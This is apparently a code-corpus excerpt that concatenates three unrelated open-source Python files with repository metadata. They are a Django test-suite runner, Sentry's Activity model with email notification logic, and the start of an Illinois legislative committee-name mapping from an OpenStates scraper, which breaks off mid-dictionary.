        suite.addTest(unittest.defaultTestLoader.loadTestsFromModule(app_module))
        try:
            suite.addTest(doctest.DocTestSuite(app_module,
                                               checker=doctestOutputChecker,
                                               runner=DocTestRunner))
        except ValueError:
            # No doc tests in models.py
            pass

    # Check to see if a separate 'tests' module exists parallel to the
    # models module
    test_module = get_tests(app_module)
    if test_module:
        # Load unit and doctests in the tests.py module. If module has
        # a suite() method, use it. Otherwise build the test suite ourselves.
        if hasattr(test_module, 'suite'):
            suite.addTest(test_module.suite())
        else:
            suite.addTest(unittest.defaultTestLoader.loadTestsFromModule(test_module))
            try:
                suite.addTest(doctest.DocTestSuite(test_module,
                                                   checker=doctestOutputChecker,
                                                   runner=DocTestRunner))
            except ValueError:
                # No doc tests in tests.py
                pass
    return suite


def build_test(label):
    """Construct a test case with the specified label.

    Label should be of the form model.TestClass or
    model.TestClass.test_method. Returns an instantiated test or test
    suite corresponding to the label provided. Raises ValueError for a
    malformed label or one that matches nothing.
    """
    parts = label.split('.')
    if len(parts) < 2 or len(parts) > 3:
        raise ValueError("Test label '%s' should be of the form app.TestCase or app.TestCase.test_method" % label)

    #
    # First, look for TestCase instances with a name that matches
    #
    app_module = get_app(parts[0])
    test_module = get_tests(app_module)
    TestClass = getattr(app_module, parts[1], None)

    # Couldn't find the test class in models.py; look in tests.py
    if TestClass is None:
        if test_module:
            TestClass = getattr(test_module, parts[1], None)

    try:
        if issubclass(TestClass, (unittest.TestCase, real_unittest.TestCase)):
            if len(parts) == 2:  # label is app.TestClass
                try:
                    return unittest.TestLoader().loadTestsFromTestCase(TestClass)
                except TypeError:
                    raise ValueError("Test label '%s' does not refer to a test class" % label)
            else:  # label is app.TestClass.test_method
                return TestClass(parts[2])
    except TypeError:
        # TestClass isn't a TestClass - it must be a method or normal class
        pass

    #
    # If there isn't a TestCase, look for a doctest that matches
    #
    tests = []
    for module in app_module, test_module:
        try:
            doctests = doctest.DocTestSuite(module,
                                            checker=doctestOutputChecker,
                                            runner=DocTestRunner)
            # Now iterate over the suite, looking for doctests whose name
            # matches the pattern that was given
            for test in doctests:
                if test._dt_test.name in (
                        '%s.%s' % (module.__name__, '.'.join(parts[1:])),
                        '%s.__test__.%s' % (module.__name__, '.'.join(parts[1:]))):
                    tests.append(test)
        except ValueError:
            # No doctests found.
            pass

    # If no tests were found, then we were given a bad test label.
    if not tests:
        raise ValueError("Test label '%s' does not refer to a test" % label)

    # Construct a suite out of the tests that matched.
    return unittest.TestSuite(tests)


def partition_suite(suite, classes, bins):
    """Partitions a test suite by test type.

    classes is a sequence of types
    bins is a sequence of TestSuites, one more than classes

    Tests of type classes[i] are added to bins[i],
    tests with no match found in classes are place in bins[-1]
    """
    for test in suite:
        if isinstance(test, unittest.TestSuite):
            # Recurse into nested suites so every leaf test is binned.
            partition_suite(test, classes, bins)
        else:
            for i in range(len(classes)):
                if isinstance(test, classes[i]):
                    bins[i].addTest(test)
                    break
            else:
                # No class matched; goes into the catch-all last bin.
                bins[-1].addTest(test)


def reorder_suite(suite, classes):
    """Reorders a test suite by test type.

    classes is a sequence of types

    All tests of type clases[0] are placed first, then tests of type classes[1], etc.
    Tests with no match in classes are placed last.
    """
    class_count = len(classes)
    bins = [unittest.TestSuite() for i in range(class_count + 1)]
    partition_suite(suite, classes, bins)
    # Flatten the bins back into bins[0] in priority order.
    for i in range(class_count):
        bins[0].addTests(bins[i + 1])
    return bins[0]


def dependency_ordered(test_databases, dependencies):
    """Reorder test_databases into an order that honors the dependencies
    described in TEST_DEPENDENCIES.

    Raises ImproperlyConfigured if the dependency graph contains a cycle
    (i.e. no progress can be made in a full pass).
    """
    ordered_test_databases = []
    resolved_databases = set()
    while test_databases:
        changed = False
        deferred = []

        while test_databases:
            signature, (db_name, aliases) = test_databases.pop()
            dependencies_satisfied = True
            for alias in aliases:
                if alias in dependencies:
                    if all(a in resolved_databases for a in dependencies[alias]):
                        # all dependencies for this alias are satisfied
                        dependencies.pop(alias)
                        resolved_databases.add(alias)
                    else:
                        dependencies_satisfied = False
                else:
                    resolved_databases.add(alias)

            if dependencies_satisfied:
                ordered_test_databases.append((signature, (db_name, aliases)))
                changed = True
            else:
                deferred.append((signature, (db_name, aliases)))

        if not changed:
            raise ImproperlyConfigured("Circular dependency in TEST_DEPENDENCIES")
        test_databases = deferred
    return ordered_test_databases


class DjangoTestSuiteRunner(object):
    """Default test runner: builds the suite, manages test databases,
    runs the tests and reports the number of failures + errors."""

    def __init__(self, verbosity=1, interactive=True, failfast=True, **kwargs):
        self.verbosity = verbosity
        self.interactive = interactive
        self.failfast = failfast

    def setup_test_environment(self, **kwargs):
        """Prepare global state for testing (DEBUG off, Ctrl-C handler on)."""
        setup_test_environment()
        settings.DEBUG = False
        unittest.installHandler()

    def build_suite(self, test_labels, extra_tests=None, **kwargs):
        """Build a suite from the given labels (or all apps if none),
        appending extra_tests and moving TestCase instances first."""
        suite = unittest.TestSuite()

        if test_labels:
            for label in test_labels:
                if '.' in label:
                    # Dotted label: a specific class or method.
                    suite.addTest(build_test(label))
                else:
                    # Bare label: the whole app.
                    app = get_app(label)
                    suite.addTest(build_suite(app))
        else:
            for app in get_apps():
                suite.addTest(build_suite(app))

        if extra_tests:
            for test in extra_tests:
                suite.addTest(test)

        return reorder_suite(suite, (TestCase,))

    def setup_databases(self, **kwargs):
        """Create the test databases.

        Returns (old_names, mirrors) -- the bookkeeping needed by
        teardown_databases to restore the original configuration.
        """
        from django.db import connections, DEFAULT_DB_ALIAS

        # First pass -- work out which databases actually need to be created,
        # and which ones are test mirrors or duplicate entries in DATABASES
        mirrored_aliases = {}
        test_databases = {}
        dependencies = {}
        for alias in connections:
            connection = connections[alias]
            if connection.settings_dict['TEST_MIRROR']:
                # If the database is marked as a test mirror, save
                # the alias.
                mirrored_aliases[alias] = connection.settings_dict['TEST_MIRROR']
            else:
                # Store a tuple with DB parameters that uniquely identify it.
                # If we have two aliases with the same values for that tuple,
                # we only need to create the test database once.
                item = test_databases.setdefault(
                    connection.creation.test_db_signature(),
                    (connection.settings_dict['NAME'], [])
                )
                item[1].append(alias)

                if 'TEST_DEPENDENCIES' in connection.settings_dict:
                    dependencies[alias] = connection.settings_dict['TEST_DEPENDENCIES']
                else:
                    # Non-default databases implicitly depend on 'default'.
                    if alias != DEFAULT_DB_ALIAS:
                        dependencies[alias] = connection.settings_dict.get('TEST_DEPENDENCIES', [DEFAULT_DB_ALIAS])

        # Second pass -- actually create the databases.
        old_names = []
        mirrors = []
        for signature, (db_name, aliases) in dependency_ordered(test_databases.items(), dependencies):
            # Actually create the database for the first connection
            connection = connections[aliases[0]]
            old_names.append((connection, db_name, True))
            test_db_name = connection.creation.create_test_db(self.verbosity, autoclobber=not self.interactive)
            for alias in aliases[1:]:
                connection = connections[alias]
                if db_name:
                    old_names.append((connection, db_name, False))
                    connection.settings_dict['NAME'] = test_db_name
                else:
                    # If settings_dict['NAME'] isn't defined, we have a backend where
                    # the name isn't important -- e.g., SQLite, which uses :memory:.
                    # Force create the database instead of assuming it's a duplicate.
                    old_names.append((connection, db_name, True))
                    connection.creation.create_test_db(self.verbosity, autoclobber=not self.interactive)

        for alias, mirror_alias in mirrored_aliases.items():
            mirrors.append((alias, connections[alias].settings_dict['NAME']))
            connections[alias].settings_dict['NAME'] = connections[mirror_alias].settings_dict['NAME']

        return old_names, mirrors

    def run_suite(self, suite, **kwargs):
        """Run the suite with a plain TextTestRunner and return the result."""
        return unittest.TextTestRunner(verbosity=self.verbosity, failfast=self.failfast).run(suite)

    def teardown_databases(self, old_config, **kwargs):
        """Destroy the test databases and restore original NAME settings."""
        from django.db import connections
        old_names, mirrors = old_config
        # Point all the mirrors back to the originals
        for alias, old_name in mirrors:
            connections[alias].settings_dict['NAME'] = old_name
        # Destroy all the non-mirror databases
        for connection, old_name, destroy in old_names:
            if destroy:
                connection.creation.destroy_test_db(old_name, self.verbosity)
            else:
                connection.settings_dict['NAME'] = old_name

    def teardown_test_environment(self, **kwargs):
        """Undo setup_test_environment (remove Ctrl-C handler, restore state)."""
        unittest.removeHandler()
        teardown_test_environment()

    def suite_result(self, suite, result, **kwargs):
        """Reduce a TestResult to the exit-code integer: failures + errors."""
        return len(result.failures) + len(result.errors)

    def run_tests(self, test_labels, extra_tests=None, **kwargs):
        """
        Run the unit tests for all the test labels in the provided list.
        Labels must be of the form:
         - app.TestClass.test_method
            Run a single specific test method
         - app.TestClass
            Run all the test methods in a given class
         - app
            Search for doctests and unittests in the named application.

        When looking for tests, the test runner will look in the models and
        tests modules for the application.

        A list of 'extra' tests may also be provided; these tests
        will be added to the test suite.

        Returns the number of tests that failed.
        """
        self.setup_test_environment()
        suite = self.build_suite(test_labels, extra_tests)
        old_config = self.setup_databases()
        result = self.run_suite(suite)
        self.teardown_databases(old_config)
        self.teardown_test_environment()
        return self.suite_result(suite, result)


def run_tests(test_labels, verbosity=1, interactive=True, failfast=False, extra_tests=None):
    """Deprecated function-style entry point; delegates to DjangoTestSuiteRunner."""
    import warnings
    warnings.warn(
        'The run_tests() test runner has been deprecated in favor of DjangoTestSuiteRunner.',
        DeprecationWarning
    )
    test_runner = DjangoTestSuiteRunner(verbosity=verbosity, interactive=interactive, failfast=failfast)
    return test_runner.run_tests(test_labels, extra_tests=extra_tests)
bsd-3-clause
kevinlondon/sentry
src/sentry/models/activity.py
5
6259
""" sentry.models.activity ~~~~~~~~~~~~~~~~~~~~~~ :copyright: (c) 2010-2014 by the Sentry Team, see AUTHORS for more details. :license: BSD, see LICENSE for more details. """ from __future__ import absolute_import from django.conf import settings from django.core.urlresolvers import reverse from django.db import models from django.db.models import F from django.utils import timezone from sentry.db.models import ( Model, BoundedPositiveIntegerField, FlexibleForeignKey, GzippedDictField, sane_repr ) from sentry.utils.http import absolute_uri class Activity(Model): __core__ = False SET_RESOLVED = 1 SET_UNRESOLVED = 2 SET_MUTED = 3 SET_PUBLIC = 4 SET_PRIVATE = 5 SET_REGRESSION = 6 CREATE_ISSUE = 7 NOTE = 8 FIRST_SEEN = 9 RELEASE = 10 ASSIGNED = 11 UNASSIGNED = 12 TYPE = ( # (TYPE, verb-slug) (SET_RESOLVED, 'set_resolved'), (SET_UNRESOLVED, 'set_unresolved'), (SET_MUTED, 'set_muted'), (SET_PUBLIC, 'set_public'), (SET_PRIVATE, 'set_private'), (SET_REGRESSION, 'set_regression'), (CREATE_ISSUE, 'create_issue'), (NOTE, 'note'), (FIRST_SEEN, 'first_seen'), (RELEASE, 'release'), (ASSIGNED, 'assigned'), (UNASSIGNED, 'unassigned'), ) project = FlexibleForeignKey('sentry.Project') group = FlexibleForeignKey('sentry.Group', null=True) event = FlexibleForeignKey('sentry.Event', null=True) # index on (type, ident) type = BoundedPositiveIntegerField(choices=TYPE) ident = models.CharField(max_length=64, null=True) # if the user is not set, it's assumed to be the system user = FlexibleForeignKey(settings.AUTH_USER_MODEL, null=True) datetime = models.DateTimeField(default=timezone.now) data = GzippedDictField(null=True) class Meta: app_label = 'sentry' db_table = 'sentry_activity' __repr__ = sane_repr('project_id', 'group_id', 'event_id', 'user_id', 'type', 'ident') def save(self, *args, **kwargs): created = bool(not self.id) super(Activity, self).save(*args, **kwargs) if not created: return # HACK: support Group.num_comments if self.type == Activity.NOTE: 
self.group.update(num_comments=F('num_comments') + 1) if self.event: self.event.update(num_comments=F('num_comments') + 1) def delete(self, *args, **kwargs): super(Activity, self).delete(*args, **kwargs) # HACK: support Group.num_comments if self.type == Activity.NOTE: self.group.update(num_comments=F('num_comments') - 1) if self.event: self.event.update(num_comments=F('num_comments') - 1) def get_recipients(self): from sentry.models import UserOption if self.type == Activity.ASSIGNED: # dont email the user if they took the action send_to = [self.data['assignee']] else: member_set = self.project.member_set.values_list('user', flat=True) if not member_set: return [] disabled = set(UserOption.objects.filter( user__in=member_set, key='subscribe_notes', value=u'0', ).values_list('user', flat=True)) send_to = [u for u in member_set if u not in disabled] # never include the actor send_to = [u for u in send_to if u != self.user_id] return send_to def send_notification(self): from sentry.models import Release from sentry.utils.email import MessageBuilder, group_id_to_email if self.type not in (Activity.NOTE, Activity.ASSIGNED, Activity.RELEASE): return send_to = self.get_recipients() if not send_to: return project = self.project org = self.project.organization if self.user: author = self.user.first_name or self.user.username else: author = None subject_prefix = self.project.get_option( 'subject_prefix', settings.EMAIL_SUBJECT_PREFIX) if subject_prefix: subject_prefix = subject_prefix.rstrip() + ' ' if self.group: subject = '%s%s' % (subject_prefix, self.group.get_email_subject()) elif self.type == Activity.RELEASE: subject = '%sRelease %s' % (subject_prefix, self.data['version']) else: raise NotImplementedError headers = {} context = { 'data': self.data, 'author': author, 'project': self.project, 'project_link': absolute_uri(reverse('sentry-stream', kwargs={ 'organization_slug': org.slug, 'project_id': project.slug, })), } if self.group: headers.update({ 
'X-Sentry-Reply-To': group_id_to_email(self.group.id), }) context.update({ 'group': self.group, 'link': self.group.get_absolute_url(), }) # TODO(dcramer): abstract each activity email into its own helper class if self.type == Activity.RELEASE: context.update({ 'release': Release.objects.get( version=self.data['version'], project=project, ), 'release_link': absolute_uri(reverse('sentry-release-details', kwargs={ 'organization_slug': org.slug, 'project_id': project.slug, 'version': self.data['version'], })), }) template_name = self.get_type_display() msg = MessageBuilder( subject=subject, context=context, template='sentry/emails/activity/{}.txt'.format(template_name), html_template='sentry/emails/activity/{}.html'.format(template_name), headers=headers, reference=self, reply_reference=self.group, ) msg.add_users(send_to, project=self.project) msg.send_async()
bsd-3-clause
sunlightlabs/openstates
scrapers/il/_committees.py
3
47168
# In different sessions of the Illinois legislature, the same # committee can have different names appear on http://ilga.gov/ # Sometimes this is just spelling of typographic, ("Agriculture & # Conservation" vs "Agriculture and Conservation"). Sometimes the # difference is larger. The COMMITTEES dictionary can be used for # resolving these different names to to the same committee. The keys # of COMMITTEE are a tuple of the 'Name' and 'Code' of the committee # as they appear on http://ilga.gov/senate/committees/default.asp or # http://ilga.gov/house/committees/default.asp. The values are arbitrary ints, used only # within the scraper as a unique identifier for the actual committee. # HIGHEST ID POSSIBLY IN USE: 1132 COMMITTEES = { ("8th District Education Oversight Su", "HAPE-HDEO"): "97", ("Access to Federal Funding", "HAFF"): "98", ("Accountability & Administrative Rev", "HAAR"): "99", ("Accountability, Subcommittee on Ele", "HELM-ACCT"): "100", ("Adoption Reform", "ADPT"): "2", ("Adoption & Child Welfare", "HACW"): "2", ("Affordable Alzheimer's Services", "HHCL-AASE"): "101", ("Alzheimer's Disease Task Force", "ADTF"): "106", ("Exec. Subcommittee - St./Loc. Gov't", "SEXC-ESLG"): "206", ("O'Hare Airport Environmental Impact", "HENH-OHAR"): "348", ("Spec. Comm. on Workers' Comp Reform", "SWCR"): "432", ("Subcomm. 
Children's Health Issues", "SNVR-SCEH"): "494", ("Subcomm.Adv.PracticeNurse's License", "SLIC-SPNL"): "499", ("Veterans' Affairs", "HVET"): "87", ("Worker's Compensation Subcommittee", "HLBR-WCOM"): "641", ("Workers' Compensation Reform", "HWCR"): "645", ("Workers' Compensation Subcommittee", "HLBR-WORK"): "641", ("Workers' Compensation and Unemploy", "HLBR-WCUI"): "91", ("Workers' Compensation", "HLBR-WORC"): "641", ("Adoption Reform, Special Committee", "ADPT"): "2", ("Agency Operations Subcommittee", "HSGA-HAGO"): "102", ("Aging", "HAGI"): "103", ("Agreed Labor Bills, Subcommittee", "HLBR-AGLB"): "104", ("Agriculture & Conservation", "HAGC"): "6", ("Agriculture & Conservation", "SAGR"): "5", ("Agriculture and Conservation", "HAGC"): "6", ("Agriculture and Conservation", "SAGR"): "5", ("Agriculture", "SAGR"): "5", ("Air Quality", "HENE-AIRQ"): "9", ("Air Quality, Subcommittee on", "HENE-AIRQ"): "9", ("Air Subcommittee", "HENE-SAIR"): "9", ("Airports, Subcomittee on", "HTRN-AIRP"): "10", ("Airports, Subcommittee on", "HTRN-AIRP"): "10", ("Amendments", "SHCA-HCAA"): "107", ("Amusement & Online Gaming Sub", "HCDA-CAOG"): "1107", ("Analytics Subcommittee", "HCBA-ALYT"): "108", ("Animal Baiting Subcommittee", "HAGC-ANIM"): "60", ("Animals Subcommittee", "HAGC-ANIM"): "60", ("Approp I", "SAPA"): "14", ("Approp II", "SAPB"): "15", ("Approp-Elementary & Secondary Educ", "HAPE"): "109", ("Approp. 
Elementary and Second Ed.", "HAPE-APES"): "1001", ("Appropriations I", "SAPA"): "14", ("Appropriations II", "SAPB"): "15", ("Appropriations III", "SAPC"): "111", ("Appropriations-Capital", "HCAP"): "1104", ("Appropriations-General Service", "HAPG"): "112", ("Appropriations-Higher Education", "HAPI"): "113", ("Appropriations-Human Services", "HAPH"): "114", ("Appropriations-Public Safety", "HAPP"): "115", ("Armed Forces & Military Affairs", "HAMA"): "116", ("Assignments", "SCOA"): "21", ("Assistance and Benefits Subcommitte", "HHSV-ASBE"): "117", ("Ballot Access Subcommittee", "HELE-BALL"): "118", ("Bio-Technology", "HBIO"): "119", ("Biotechnology Committee", "BIOT"): "119", ("Broadband Access and IT Assurance", "HCDA-CBAI"): "1108", ("Broadband Infrastructure, Subcommit", "HTEL-HBBI"): "121", ("Business & Occupational Licenses", "HBOL"): "24", ("Business and Industry Regulations S", "HLBR-LBIR"): "1109", ("Business Growth & Incentives", "HBGI"): "122", ("Business Growth & Incentives", "HSBG"): "122", ("Business Incentives for Local Comm.", "HBIL"): "124", ("Business Licenses Subcommittee", "HBOL-BLIC"): "125", ("Business Licenses Subcommittee", "HBOL-BOBL"): "125", ("Business Licenses Subcommittee", "HBOL-BULI"): "125", ("Business Occupational Licenses", "HBOL"): "24", ("Business Regulation", "HBOL-BREG"): "128", ("Campaign Finance Subcommittee", "HELE-CAFI"): "129", ("Cemeteries Subcommittee", "HJUA-CEME"): "130", ("Charter Schools Subcommittee", "HELM-CHAR"): "33", ("Charter Schools", "HELM-CHAR"): "33", ("Child Care Access & Early Childhood", "HCEC"): "1105", ("Child Support Enforcement", "HCSE"): "131", ("Childhood and Young Adult Onset Sub", "HMEH-CHIL"): "132", ("Cities & Villages", "HCIV"): "133", ("Civil Procedure Subcommittee", "HJUA-CIPS"): "134", ("Civil Procedure Subcommittee", "HJUA-JCIP"): "134", ("Civil Process Subcommittee", "HJUA-HCIV"): "134", ("Civil Process and Procedures Subcom", "HJUA-CIPP"): "134", ("Climate Change Subcommittee", 
"HENE-CCHA"): "137", ("Coal Finance Subcommittee", "HREF-HCOA"): "138", ("Com. Oversight Medicaid Mang. Care", "SOMM"): "30", ("Comm. On State & Pension Fund Inves", "SSPF"): "2274", ("Commerce & Business Development", "HCBD"): "140", ("Commerce & Economic Development", "SCED"): "64", ("Commerce and Economic Development", "SCED"): "64", ("Commerce and Innovation Subcommitte", "HLBR-LCIS"): "1110", ("Commerce", "SCOM"): "139", ("Commercial Law Subcommittee", "HJUA-COLS"): "141", ("Commercial Law Subcommittee", "HJUA-JCLS"): "141", ("Committee of the Whole", "HCWL"): "34", ("Committee of the Whole", "SCWL"): "35", ("Committee on Housing", "SSCH"): "157", ("Committee on Pension Investments", "SSCP"): "142", ("Committee on Restorative Justice", "SCRJ"): "143", ("Committee on Supplier Diversity", "SCSD"): "648", ("Community Affairs", "SHCA-SSCA"): "144", ("Community Care Program Subcommittee", "HAGI-CARE"): "145", ("Community College Access & Afford.", "HCCA"): "146", ("Compensation Subcommittee", "HCOT-COMP"): "147", ("Computer Technology", "HCOM"): "148", ("Conflicts of Interest", "HCFI"): "149", ("Consolidated Subcommittee", "HCOT-CONS"): "150", ("Consolidation & Tax Subcommittee", "HCOT-CTCT"): "150", ("Constitutional Law Subcommittee", "HJUA-JCDL"): "1111", ("Constitutionality and Redundancy", "HJUB-CORE"): "151", ("Construction Industry & Code Enforc", "HCIC"): "152", ("Consumer Health Subcommittee", "HCON-COHE"): "153", ("Consumer Protection", "HCON"): "154", ("Consumer Protection", "SCCP"): "155", ("Consumer Regulation", "HCON-HCRG"): "156", ("Consumer Regulation, Subcomittee", "HCON-HCOR"): "156", ("Consumer Review Subcommittee", "HCON-CRVW"): "158", ("Corrections Subcommittee", "HJUB-CORR"): "159", ("Cost Analysis Subcommittee", "HAPI-COST"): "160", ("Cost Benefit Analysis", "HCBA"): "161", ("Counties & Townships", "HCOT"): "162", ("Credit & Affordable Housing", "SHCA-SCAH"): "41", ("Crim. 
Law Subcom Enhance/Redundancy", "SCCL-SCER"): "163", ("Criminal Admin and Enforcement", "HJUC-CRIM"): "164", ("Criminal Justice Reform Subcommitte", "HREJ-HCJR"): "165", ("Criminal Law Subcomm. Const. Review", "SCCL-SCCR"): "167", ("Criminal Law Subcomm. on Firearms", "SCCL-SCCF"): "168", ("Criminal Law", "SCCL"): "166", ("Criminal Procedure, Penalties", "HJUA-CPPS"): "169", ("Cybersecurity, Data Analytics, & IT", "HCDA"): "170", ("DCFS Oversight", "HDCF"): "171", ("Deficit Reduction", "SCDR"): "172", ("Develop Disabilities Mental Illness", "HDMI"): "173", ("Disability Services", "HDIS"): "174", ("Disparities in Educational Achievem", "HDEA"): "175", ("Distributed Ledgers & Cryptocurrenc", "HCDA-CDLC"): "214", ("Distributed Ledgers & Cryptocurrenc", "HCDA-DLCS"): "214", ("Dog & Cat Pop. Control Adv. Comm.", "DCPC"): "176", ("Domestic Relations Law Subcommittee", "HJUA-DRLS"): "177", ("Drivers Education & Safety", "HDES"): "178", ("Drugs Subcommittee", "HJUB-DRGS"): "179", ("E & E Subcomm. on Chem. & Coal", "SENV-SECC"): "180", ("Economic Development & Housing", "HECD"): "47", ("Economic Development", "HECD"): "47", ("Economic Growth and Mod. Sub.", "HECD-HEGM"): "181", ("Economic Justice & Equity", "HEJE"): "182", ("Economic Opportunity", "HECO"): "183", ("Economic Opportunity & Equity", "HECO"): "183", ("Education Policy & Procedure", "SESE-SEPP"): "185", ("Education Reform", "EREF"): "186", ("Education", "SESE"): "184", ("Election Administration Subcommitte", "HELE-ELEC"): "187", ("Elections & Campaign Finance", "HELE"): "189", ("Elections & Campaign Reform", "HECR"): "52", ("Elections and Campaign Reform", "HECR"): "52", ("Elections", "SELC"): "188", ("Electric Deregulation, Subcommittee", "HENE-ELEC"): "190", ("Electric Generation & Commerce", "HEGC"): "191", ("Electric Utility Oversight", "HEUD"): "192", ("Electric and Natural Gas, Subcom", "HPUB-ELEC"): "193", ("Elem Sec Ed: Adm., Lic. 
& Charter", "HELO"): "56", ("Elem Sec Ed Charter School Policy", "HELC"): "53", ("Elem Sec Ed School Curricu Policies", "HELM"): "54", ("Elem Sec Ed: Charter School Policy", "HELC"): "53", ("Elem Sec Ed: Licensing Oversight", "HELO"): "56", ("Elem Sec Ed: Licensing, Admin.", "HELO"): "56", ("Elem Sec Ed: School Curric Policies", "HELM"): "54", ("Elementary & Secondary Education", "HELM"): "54", ("End of Career Compensation Sub", "HPPN-ENCC"): "195", ("Energy & Environment", "HENG"): "196", ("Energy Management, Subcommittee", "HHED-ENER"): "197", ("Energy Resources Subcommittee", "HENE-ENRE"): "911", ("Energy and Public Utilities", "SENE"): "59", ("Energy", "HENG"): "196", ("Energy", "SENE"): "59", ("Enhancement of Criminal Penalties", "HJUB-EOCP"): "198", ("Enterprise Zone Extensions", "SCEZ"): "199", ("Environment & Energy", "HENE"): "62", ("Environment & Energy", "SENV"): "49", ("Environment Subcommittee", "HENE-ENVI"): "200", ("Environment and Conservation", "SNVR"): "63", ("Environment and Energy", "HENE"): "62", ("Environment and Energy", "SENV"): "49", ("Environment", "HENE"): "62", ("Environment", "SNVR"): "63", ("Environmental Health", "HENH"): "201", ("Environmental Justice Subcommittee", "HENG-EJUS"): "1112", ("Environmental Quality Subcommittee", "HENE-SEQU"): "202", ("Environmental Regulations Subcommit", "HENE-ENRE"): "61", ("Ethanol Production Oversight", "HEPO"): "203", ("Ex-Offender and Reentry Subcommitte", "HAPP-EXOF"): "204", ("Exec. Subcomm. Fin/ Lic Activities", "SEXC-ESLA"): "205", ("Exec. Subcommittee on Amendments", "SEXC-EXSA"): "207", ("Exec. Subcommittee on Education", "SEXC-ESOE"): "208", ("Exec. 
Subcommittee on Tobacco", "SEXC-ESOT"): "209", ("Exec.Subcommitte on Gaming", "SEXC-ESOG"): "210", ("Executive Appointments", "SEXA"): "213", ("Executive Subcommittee on Amendment", "SEXC-SXAM"): "207", ("Executive Subcommittee on Education", "SEXC-SXED"): "73", ("Executive Subcommittee on Revenue", "SEXC-SXRV"): "215", ("Executive", "HEXC"): "211", ("Executive", "SEXC"): "212", ("Expansion of Sex Offenses and Sex", "HJUB-ESOR"): "216", ("Facilities Subcommittee", "HHSV-FACI"): "217", ("Facilities Subcommittee", "HHSV-HFAC"): "217", ("Facilities Subcommittee", "HHSV-HFHS"): "217", ("Facilities and Institutions Subcomm", "HHSV-FAIN"): "217", ("Family Law Subcommittee", "HJUA-JFAL"): "1113", ("Fee For Service Initiatives", "FFSI"): "220", ("Fee-For-Service Initiatives", "HFEE"): "220", ("Fin Inst Subcommittee on Amendments", "SFIC-FINA"): "222", ("Fin. Inst. Predatory Lending", "SFIC-FIPL"): "223", ("Fin. Inst. Subcomm. Special Issues", "SFIC-FISI"): "224", ("Finance Subcommittee", "HREF-FINA"): "225", ("Finance Subcommittee", "HREF-HREF"): "225", ("Finance", "HREF-FINC"): "225", ("Financial Institutions", "HFIN"): "228", ("Financial Institutions", "SFIC"): "229", ("Fire & Emergency Services", "HFES"): "230", ("Fire Protection", "HFIR"): "231", ("Fire Service Subcommittee", "HFES-FISE"): "232", ("Firearms Subcommittee", "HAGC-FIRE"): "233", ("Firearms Subcommittee", "HJUA-FIRE"): "234", ("Firearms and Firearm Safety Subcomm", "HJUC-FIRE"): "235", ("Firearms and Firearm Safety Subcomm", "HJUC-JCFF"): "235", ("Food Products Subcommittee", "HAGC-FOOD"): "237", ("Force Fed Birds, Subcommittee", "HAGC-HFEB"): "238", ("Foreclosure, Subcommittee of Local", "HLGV-FORE"): "239", ("Future Roads: Growth & Improvement", "HTRR-FRGI"): "240", ("Gaming Subcommittee", "HEXC-GAME"): "243", ("Gaming", "HGAM"): "241", ("Gaming", "SGAM"): "242", ("Gaming-Revenue", "SGRC"): "244", ("Gang Crimes, Judicary II Subcommitt", "HJUB-HGCR"): "245", ("General Law Subcommittee", "HJUA-GLAW"): 
"246", ("General Law Subcommittee", "HJUA-HLAW"): "246", ("Gov. Accountability & Streamlining", "HSGA-GOVE"): "248", ("Government Accountability/Pensions", "SGAP"): "1101", ("Government Consolidation & Modern", "HGCM"): "249", ("Government Consolidation Analysis", "HGCM-GCAC"): "279", ("Government Operations Subcommittee", "HJUA-GOOP"): "250", ("Government Process Subcommittee", "HSGA-HGPR"): "251", ("Government Reform", "SGRM"): "252", ("Government Transparency", "HGOT"): "253", ("Govt. Accountability and Streamlini", "HSGA-GOAS"): "248", ("Growth, Reform & Fairness Subcommit", "HREF-GRFS"): "255", ("HHS-BDD Subcommittee", "SHHS-SHHB"): "256", ("HS Medicaid Subcommittee", "HHSV-MEDI"): "257", ("Health & Healthcare Disparities", "HHCD"): "258", ("Health & Human Services Health Care", "SHHS-SHHH"): "259", ("Health & Human Services", "SHHS"): "81", ("Health Care Availability Access", "HHCA"): "82", ("Health Care Availability & Access", "HHCA"): "82", ("Health Care Licenses", "HHCL"): "260", ("Health Exchange Marketplace Sub", "HINS-HEMS"): "261", ("Health Exchanges Subcommittee", "HINS-EXCH"): "261", ("Health Insurance Subcommittee", "HINS-IHLT"): "1114", ("Healthy Illinois Plan", "HHCA-HHIP"): "263", ("Higher Ed Special Issues Sub", "HHED-HESI"): "264", ("Higher Ed. Subcommittee-Comm. 
Coll.", "SCHE-HECC"): "265", ("Higher Education Analysis Subcommit", "HHED-HEAS"): "268", ("Higher Education Issues Subcommitte", "HHED-HEDI"): "264", ("Higher Education", "HHED"): "266", ("Higher Education", "SCHE"): "267", ("Highways & Transit Subcommittee", "HTRR-HITR"): "270", ("Homeland Security & Emergency Prepa", "HSEP"): "271", ("Hospital Closures, Subcommittee of", "HAPH-HOSC"): "272", ("House Budget Oversight Panel", "HBOP"): "273", ("Housing", "HOUS"): "274", ("Housing & Community Affairs", "SHCA"): "89", ("Housing & Urban Development", "HHUD"): "90", ("Housing and Community Affairs", "SHCA"): "89", ("Housing and Property Subcommittee", "HJUA-HOPO"): "275", ("Housing and Urban Development", "HHUD"): "90", ("Housing, Special Committee On", "SSCH"): "280", ("Human Services", "HHSV"): "276", ("Human Services", "SHHS"): "81", ("Hunting Subcommittee", "HAGC-HUNT"): "277", ("IL State Toll Highway Authority", "TOLL"): "278", ("Income Tax Subcommittee", "HREF-HTAX"): "93", ("Income Tax Subcommittee", "HREF-INTX"): "93", ("Income Tax Subcommittee", "HREF-ITAX"): "93", ("Income Tax Subcommittee", "HREF-RITA"): "93", ("Income Tax", "HREF-ITAX"): "93", ("Income Tax, Subcommittee on", "HREV-ITAX"): "93", ("Income Tax, Subcommittee on", "HREV-RITX"): "93", ("Informed Consent Subcommitee", "HHSV-INFO"): "284", ("Informed Consent Subcommittee", "HHSV-HICO"): "284", ("Informed Consent Subcommittee", "HHSV-INCO"): "284", ("Informed Consent Subcommittee", "HHSV-HCON"): "284", ("Infrastructure", "HIND"): "286", ("Ins. Health Care Cost Drivers, Sub", "HINS-COST"): "287", ("Ins. 
